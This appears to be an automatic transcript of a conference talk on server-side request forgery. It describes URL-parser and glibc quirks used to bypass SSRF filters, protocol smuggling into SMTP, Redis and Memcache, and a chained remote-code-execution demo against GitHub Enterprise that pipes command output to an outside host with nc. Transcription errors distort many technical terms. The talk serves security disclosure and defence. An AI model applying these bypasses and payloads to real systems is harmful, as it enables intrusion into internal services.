Hi, thanks for coming. This talk will be about my research on SSRF. And since this is the only talk about web security in Black Hat Asia, the first concept of SSRF was found 10 years ago. Since then, many exploitations and mitigations were developed. In this talk, I will introduce my findings. These findings are not only able to bypass existing SSRF protections, but also leads to critical remote code executions. Also, we will give case studies in real web applications and a demo on GitHub. Okay, let's go. I'm Orange from Taiwan. Love to play CTF and join bug bounty programs. You can find what CTF or vulnerabilities I find here. I'm lucky that my company allowed me to do that. You know, this needs a lot of time. I'm now working in a security startup. Its name is DevCore. DevCore is the most professional red team in Taiwan. I'm a security researcher. My job is finding 0 days and researching the newest exploit techniques. For example, we recently found 2 critical remote code execution on the most popular mail server. If you are interested, read our blog for details. I'm also a member of Changelog and HitCon. HitCon is the largest hacker conference in Taiwan. By the way, HitCon 2018 will take place on July 28 and 29. Welcome to join us. This is our agenda today. Our goal is to make SSRF great again. First, I will introduce SSRF and start with some quick fun examples. Next, I will talk about my findings in both an attack surface on SSRF bypass and a new attack vector in protocol smuggling that enhances the existing SSRF. By combining this, we can achieve more advanced exploitations or compromise the server. Of course, we will have case studies and demo. What is SSRF? Okay, I know this is Black Hat Asia, not SSRF 101, so I don't need to talk about lots of trivial introductions. I suppose you all know what SSRF is. SSRF, in a word, it can bypass the firewall and touch your intranet. So the attack surface is dependent on how big your intranet is. The larger your enterprise is, the more robust SSRF will be. For example, in a big company, there are lots of Trust2, Redis, Elastic you can point by SSRF. And next, protocol smuggling in SSRF. It makes SSRF more powerful. There are several ways to smuggle protocols in a SSRF, and each way has its limitation. So what protocol is good to smuggle? I have a list here, and you can check. Okay, our introduction part is over. Short, right? Before we start our topic, I want to make a survey. How many people use Python? Please raise your hand. Wow. I want to ask you a question. If you want to access the web with Python, which library do you prefer? I think the most Python guys use request-s, URLlib, or URLlib2. Let's start with a fun example. Think about this URL. The red square is the space. So, which address Python is going to access? You have 5 seconds to put answer in your mind. Okay, here is the answer. Actually, even Python's built-in libraries treat the same URL differently. URL_lib accesses the blue part, and the URL_lib2 accesses the orange part, but green is request as. It sounds crazy. Python is really, really hard. I don't understand Python. Another showcase, it is easy to understand if there is a SSRF injection in HTTP, and we can smuggle other protocols. But as you can see, for the security concern, most of SNTP servers block the HTTP connection. If server finds the HTTP pattern, such as get/ or post/ in the incoming request, the server will cut off the connection. So SNTP has HTTP protocol, and it seems unexploitable. Somebody might say, you can use Gopher. We are not going to talk about Gopher today. Gopher is good, but what if there is no Gopher support? Gopher is too easy to block, and not all programming language supports Gopher. But in a SSRF, the HTTP always exists. So we focus on the attack scenario on the HTTP and HTTPS. Let's smuggle SNTP protocol over HTTPS. HTTPS is a secured protocol, so the payload will be encrypted. So how? Let's think about a question. What won't be encrypted in a SSL handshake? The answer is SNI, server name indication. We can send a HTTPS request on port 25 to bypass the limitation. Smuggle SNTP over SSL SNI, I think no one mentioned this before. During the SSL, the hello messenger will be the handshake that exchange the metadata between the server and the client. And there is a SNI extension which specifies the remote hostname in this message. So, what if we can disrupt the hostname? Yes, the yellow square. This space makes it possible to embed our malicious payload in the domain name. So you can see, with the space, we can now inject new lines and data in the domain name. Okay, why this works? We used a trick in Linux GLibc, and we will introduce later. The data separated by new lines is SNTP protocol we smuggled. Our command simply requests a SNTP server to send a mail. This is the request and the response in plain text. You can see there is no HTTP pattern such as get/ or post/ here. And the server still recognizes our payload as a valid command. So we exploit the unexploitable successfully. These two examples are interesting, right? Okay, let's go to our main content. I think there may be lots of bugs on URL parsers, so I designed a fuzzer to find this problem out. The idea is simple. We create several groups in a URL and fill with random bytes. Our fuzzing model just tests all language implementations and find the weird one. Because we also fuzz the URL requester, so we need to ensure they are all in the local network. So we also set up a local DNS server and a local web server and IP tables to speed out all the process. For example, for the send input, every language return 127.1.1.1, but Perl return 127.2.2.2. So we compare the result and figure out the weird one is Perl. This is a real-world result. Our input is 127.0.0.1 / semicolon at 127.2.2.2. And you can see the result. The URL parser on JavaScript is different from others. So we can put more attention on why JavaScript have this behavior. I have released my fuzzer on GitHub. You can find the source on github.com/orangetw tiny URL fuzzer. Okay, so let's look what issues we find from my fuzzer. Today, we prepared 4 sections to make SSRF great again. First part, URL parsing issues. This is all about the inconsistency between the URL parser and the URL requester. It is common to fix a SSRF by validating the URL. But validating a URL is a hard work. Why? The spec of URL is defined in RFC 3986, but only spec without implementation guidelines. WG is a community trying to define a modern implementation based on RFC. But in fact, programming language still prefer their own implementation more. So there are lots of mistakes on URL parsers. How RFC define the URL? This is the URL components defined in RFC 3986. They are totally 5 parts: scheme, authority, path, query, and fragment. And this is what we will cover today: the scheme, authority, and path. For the scheme, we only care about the attack scenario on the HTTP and HTTPS. For the authority and path, they are too complex to understand, and we will take a look later. Finally, as the query and fragment, I don't care. This is the big picture of the problems we will mention today. We classify the URL parsing issue into 3 types: poll injection, host injection, and path injection. So does protocol smuggling. Smuggling on path, smuggling on host, and smuggling on SNI. Consider the following code in PHP. The code simply fetches the user-provided URL. In order to prevent SSRF, developers use the function parseURL to check whether the host and poll are valid or not. So, if you provide 127.0.0.1 and poll 81, you will not pass the check. But how about this URL? Everyone knows colon is the separator between the host and the poll. IFC defined the spec but didn't say how to implement. So, will this colon be interpreted from the front or the back? It is interesting. For this URL, the PHP function parsURL recognizes 80 as poll number. But actually, PHP read file fetches the poll number 11-11. Both parsURL and read file are the built-in function in PHP, but their behaviors are very distinct. So we can use this inconsistency to bypass the check. And how about this URL? google.com/avo.com. This is another interesting case. ParsURL will recognize google.com as hostname, but the read file fetches avo.com. This URL perfectly bypasses all the restrictions. But are you curious about which behaviors is the right one? Let's make a little survey. If you think google.com is the right one, please raise your hand. Okay, I think the domain avo.com already told you the answer. Several programming languages suffered from this issue, like PHP, Java, Perl, and Python. According to the IFC, the authority part is preceded by a double slash and is terminated by the next slash. So the appropriate authority part is google.com. Okay, if you don't like PHP, let's explore curl. Curl is the world famous library, and there are lots of language bindings. Think about how curl interprets this URL. foo@avo.com, poll80@google.com. Most parsers recognize google.com as a valid hostname, but curl fetches avo.com. The inconsistency between the parser and curl will also lead to security problems. I think we all agree that curl is a world-famous library with lots of language bindings. Therefore, if an application uses its parsing library to check the URL, but fetch the results by curl, it might be vulnerable. This is very common in PHP because PHP built-in HTTP library sucks. After I find this issue, I quickly report to the curl security team, and their reply is in no time. But while checking the patch, I find we can simply bypass the patch by an additional space. But this is not the fault of curl. This also uses a feature in Linux GLibc, and we will talk about later. However, I think curl can be more strict, so I report again. But this time, curl team replied, curl doesn't verify that the curl is 100% syntactically correct. It is instead documented to work with URL and assume that you passed correct input. So curl thinks this is programmer's problem, so this won't be fixed. But previous patch still applied on curl 7.45. Okay, the next attack vector is about the Unicode failure on NodeJS. Look at the following code. In order to prevent directory traversal, the code checks there is no ... in the path. So you can't access the file outside the sandbox directory. The question is, if there is a password file on the web root, how to access the file? The answer is using the Unicode symbol /n. This URL actually accesses the file password on the web root. Okay, why? Let's explain. The JavaScript's internal process the Unicode string as encoding UCS2. So the Unicode symbol N will be represented in FF2E. And the tricky thing is the buffer string in HTTP module will fold byte, and the FF will be stripped. And the remaining part is 2E, the ASCII of dot. The server will identify the ... as the parent directory. So we can download the password file on the web root from remote server. The double /n is new ... in Node.js HTTP module. What hell? This technique can be also applied on protocol smuggling. Originally, HTTP module prevents user from SSRF injection. The HTTP module will encode the new line as % encoding. So, if we inject new line in the path, our smuggling will fail. But we can break the protection by Unicode symbol FF0D and FF0A, the full with dash and the full with asterisk. The HTTP module cannot locate any new line in the path, but output still for the byte and strip the FF. So our protocol smuggling reproduce again. Okay, next section is about the features on Linux GLibc. First, this is a weird feature in NSS function getHostByName. By looking the source of glibc, there is a command here. Convert an ASCII string into an encoded domain name as per IFC 1035. But what is IFC 1035? The IFC 1035 describes the detail of the domain system and protocol. But the surprise is the domain system support decimal conversion in getHostByName. You can see the C program. The result of OR \097 NGE.tw is equal to the result of Orange.tw. I roughly grabbed the Linux main page, but I didn't find anything related to this weird feature. I think this may be useful when bypassing some blacklist protections. And the source code showed that getHostByName will remove the / that is not following by digit. This is also a good way to obfuscate your domain name with lots of backslashes. You can see I print out the hostname to show that the escaping process is done by getHostByName. The next feature is about the Linux get address info. Get address info will strip trailing rubbish, followed by a valid IP format and the white space. You can see the C program. The domain 127.0.0.1 space FOO is valid and return 127.0.0.1. Get address info is a very fundamental function in Linux. For example, the function get host by name in Python circuit module relied on Linux get address info. So the CRF FOO in the domain name will be removed. This makes it possible to do more complex attacks based on the polluted domain name. Okay, let's talk about how to exploit these features on URL parsers. URL parsers might recognize all the authority part as hostname, but HTTP requesters still fetch 127.0.0.1. The %2509 is a special one and need more explanations. Why double encoding works? After digging some library source, we find that libraries such as Perl decode the URL twice. So these patterns are useful when breaking some subdomain checks. And how to exploit NSS features on protocol smuggling. First, why this work? This is because that HTTP protocol 1.1 required a host header. And most of libraries embed the hostname into HTTP request. So the idea is, if we can inject new lines in the hostname, we have the ability to smuggle protocols in HTTP. For example, the data with new line in the hostname will be recognized as a valid Redis command. You can see we smuggle the sled of command over the HTTP protocol. By the way, the sled of is a useful command that you can make out of bound traffic. This is very useful trick when you are facing some blind SSRF. SNI injection is also the same idea. During the SSL, the SNI extension will embed the hostname in the hello message. So if we inject new line in the hostname, we can find out the command in the encrypted message. Let's break the patch of the Python CVE 2016-5699. It's a CRF injection in the function put header of module HTTP lib. It also affects both URL lib and URL lib2 because they use HTTP lib to construct their HTTP request. Python uses a regular expression to ensure there is no new line in the header. Otherwise, it will raise an error. But Python makes an exception of the tab and space followed by the new line. So we can break the patch by a leading space. You can see with the space, the URL lib and URL lib2 are vulnerable again. But this brings out a new problem. There is one more leading space in our payload. Does protocol smuggling work on this way? The answer is yes, thanks to the Redis and main cache. As you can see, the sled of command starts with a leading space, and the server still replied OK. So Redis and Memcache will strip the leading space, so our exploit works again. The last attack vector is about the IDNA standard. IDNA defines the standard of Unicode in domain name system. There are two primary versions of IDNA, 2003 and 2008. But IDNA 2008 is too strict. So most of the parsers follow the IDNA 2003 with UTS 46 transition. The IDNA supports lots of weird Unicode transitions. For example, the circled alphabet will be recognized as a valid letter in domain name system. And the Unicode 200D, 0 with joiner, will be removed in IDNA 2003 with UTS 46 transition. So if the parser and the request adopt different IDNA standard, it might be a security problem. A very fun example is the Latin letter small sharp s. This is a JavaScript example you can run on your browsers. You can see the symbol in lowercase is the same as itself. But in uppercase, it becomes the double capital S. And the redirection in browsers will go to WordPress.com. This is very useful when breaking some blacklist, and we will give a real case study later. Okay, case studies. This table shows which components WordPress, VBullet, and MyBB will to treat a URL. The main concept of the bypass is finding the different behaviors among the parser, DNS tracker, and the requester. If you find one, then you have the ability to bypass the restriction. This is the source of MyBB. The first bypass is not a new trick. It's time of track to time of use problem. MyBB use parse URL to check whether the hostname, skin, and poll are valid or not. And also use getHostByName to resolve the domain to ensure that the address is not in blacklist. So if the URL passed all the check, MyBB will fetch the URL by curl. The problem is the state of track and the state of use can be different. We can set up a DNS server and lead the first query to a non-blacklist address, such as 1.2.3.4. After we pass the track, MyBB will fetch the URL by curl. The curl will query the domain name again. At the moment, we change the DNS record to 127.0.0.1. So the state in track is 1.2.3.4, but the state in use is 127.0.0.1. So that we can bypass the protection. The next bypass is about the support of IDNA standard. Curl is a very intelligent library which can automatically convert the global domain name to an IP address. But PHP getHostByName can't. This inconsistency also leads to the SSRF bypass. You can see for the URL, getHostByName will return false and pass the check, but the curl still fetches 127.0.0.1. The last bypass is the inconsistency between the parser and the requester. We mentioned several URL parsing bugs before. By using these bugs, we can bypass all the restrictions. For the number sign bug, the parse URL recognizes google.com as hostname, but curl fetch 127.0.0.1. This is handy, but has been fixed in PHP 1.0.13. If you don't like PHP, you can still exploit the bug in curl, and the result is the same. This bug is also fixed in curl 7.15.4, but most of the patches didn't keep up. For example, the libcurl in Ubuntu, in the latest version of Ubuntu, is still 7.52.1. So I think most systems are still on the thread. Or you can use the space technique we mentioned before. And about this issue, curl won't fix. Okay, let's see our last case study, GitHub Enterprise. GitHub Enterprise is a local version of GitHub that you can deploy a whole GitHub service in your private network. Most of the code are written in Ruby on Rails and First-Cat. The code base of GitHub Enterprise seems to be same as github.com, and there is an environment variable that you can switch the mode from enterprise version to .com version. So if you want to study the security on GitHub, I highly recommend GitHub Enterprise to you. In this case, I will show you a beautiful exploitation that turned 4 vulnerabilities into a critical remote code execution. It also won the best report in GitHub's 3rd Bug Bounty anniversary. While playing GitHub Enterprise, I noticed there is an interesting feature called webhook. Webhook can define a custom HTTP callback when specific Git command occurs. GitHub uses RubyGen validity to fetch external resource and prevent users from SSRF by Gen validity restrict IP addresses. The Gen seems to be just a simple blacklist and can be bypassed by a 0. In Linux, the 0 stands for localhost. So we got a SSRF now. However, we still can't do anything. Why? There are several limitations in this SSRF, such as this SSRF only allows the string HTTP and HTTPS, and we can't change the string by the 302 redirection. This is also a post-based SSRF. We can't even control the header or the post data. The most important thing is there is no CRF injection in this SSRF. So we have a SSRF, but with lots of limitation. My next idea is there any service we can leverage? It is a bit work. There are several services inside, and each service based on different language implementation, such as C, C++, Go, and Python. With a couple of days digging, I find there is a service called Graphite on port 8000. Graphite is a highly scalable and real-time graphing system. Of course, we find another SSRF here. The second SSRF is simple. Graphite just fetch the URL from the get parameter. So we have 2 SSRF now, and we can combine these 2 SSRF into a SSRF execution chain. And we successfully switch a post-based SSRF into a get-based SSRF. The third bug is the SSRF injection ungratified. As you can see, the implementation of the second SSRF is Python HTTP lib. Earlier, we mentioned that HTTP lib suffered from SSRF injection. So, with the SSRF injection, we now have the ability to smuggle protocols in this SSRF execution chain. However, the next problem is what protocol did I choose to smuggle? I spent lots of time to find out what vulnerabilities can be triggered if I can control the Redis or main cache. While reviewing the source, I am curious about why GitHub can store Ruby object in main cache. After some digging, I find GitHub used RubyGen to store the cache, and the cache was wrapped by Marshall. It's a good news to us. Everyone knows Marshall is very dangerous. So our goal is very clear. We use our SSRF execution chain to store malicious Ruby object in main cache. The next time GitHub fetches the cache, the RubyGen will deserialize the data automatically. And the result is we got a remote code execution. Here is the final payload. There are several paths. The red path is the first SSRF bypass in webhook, combined with the blue path, the second SSRF. The yellow is the main cache protocol we smuggled. And the final dark blue path is our malicious Ruby object. In this case, we execute the command id pipe orange nc orange.tw port 12345. In this case, avoid $12,500 from GitHub. Okay, let's watch the demo video, remote code execution on GitHub Enterprise. Okay, this is GitHub Enterprise. It's very similar to github.com. The version is 2.8.6. In order to add a webhook, we open our profile, repository, and settings. Click Hooks and Service and add a webhook. Okay, here is the callback URL. We open our console. And this is our exploit file. And run the exploit. Here is our SSRF payload. We pass the payload to the GitHub Enterprise. Okay, when we submit the form, the SSRF execution chain will insert a malicious data to the main cache. Okay, we listen a poll on 12345 and wait the command back. The final step is to trigger the deserialization. We can search a keyword to trigger the RCE. Okay, as you can see, we got a shell. Okay, mitigations. How to prevent such attacks in SSRF? From two aspects. For application layer, use the only IP to connect and remember, don't reuse the URL that user provided. For network layer, use firewall or network policy to block internal traffics. There are also projects that designed to prevent you from SSRF attacks. SafeCurl by Finite or Advocate by Jordan Mile. Okay, summary. First, we introduce a new attack surface on SSRF bypass, include the issue on URL parsers and the inconsistency between the IDNA standards. Second, new attack vectors on protocol smuggling. We showed that weird feature on Linux GLibc and the Unicode failure on NodeJS. These issues can inject malicious payload in a valid HTTP request to bypass the firewall and touch the intranet services. The last, we give case studies on such Python, MyBB, and GitHub. First work, maybe someone or I can do in the future. Finding similar URL parser issues on OAuth, modern browsers, or cache server, or proxy server. Okay, this is the end of my presentation. If you had further questions, here is my contact information, orange@changelog.org. Or you can find me on Twitter, orange_A361. Thanks for staying with me. Thanks. So maybe, no Q&A. If you have a further question, you can contact me. Yeah, I will be here. Thank you.